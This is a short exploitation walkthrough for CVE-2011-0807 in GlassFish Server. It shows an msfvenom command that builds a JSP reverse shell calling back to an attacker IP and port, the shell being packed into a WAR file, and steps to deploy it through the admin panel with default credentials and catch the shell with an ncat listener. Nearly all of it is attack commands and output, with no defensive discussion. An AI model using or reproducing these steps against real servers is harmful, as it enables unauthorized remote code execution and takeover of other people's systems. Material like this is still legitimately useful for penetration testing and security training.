Description
This module logs in to an GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads, and executes commands via deploying a malicious WAR. On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x.
CVE
CVE-2011-0807
Steps to exploit
βββ(n16hth4wkπ½n16hth4wk-sec)-[~/Glassfish]
ββ$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.139.10 LPORT=5566 -f raw -o shell.jsp
Payload size: 1499 bytes
Saved as: shell.jsp
βββ(n16hth4wkπ½n16hth4wk-sec)-[~/Glassfish]
ββ$ mkdir shell
βββ(n16hth4wkπ½n16hth4wk-sec)-[~/Glassfish]
ββ$ cp shell.jsp shell
βββ(n16hth4wkπ½n16hth4wk-sec)-[~/Glassfish]
ββ$ cd shell
βββ(n16hth4wkπ½n16hth4wk-sec)-[~/Glassfish/shell]
ββ$ jar -cvf ../shell.war *
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
adding: shell.jsp(in = 1499) (out= 587)(deflated 60%)
βββ(n16hth4wkπ½n16hth4wk-sec)-[~/Glassfish/shell]
ββ$ cd ../
βββ(n16hth4wkπ½n16hth4wk-sec)-[~/Glassfish]
ββ$ ls
shell shell.jsp shell.war
Glassfish 3.1.3
login to the admin panel and click on deploy an application
upload the war shell file we created earlier and click ok to upload
click launch to launch the appliication and start your listener on ncat
click on the link to trigger the shell
check back your listener
we got a reverse shell. and we are through π easy huh?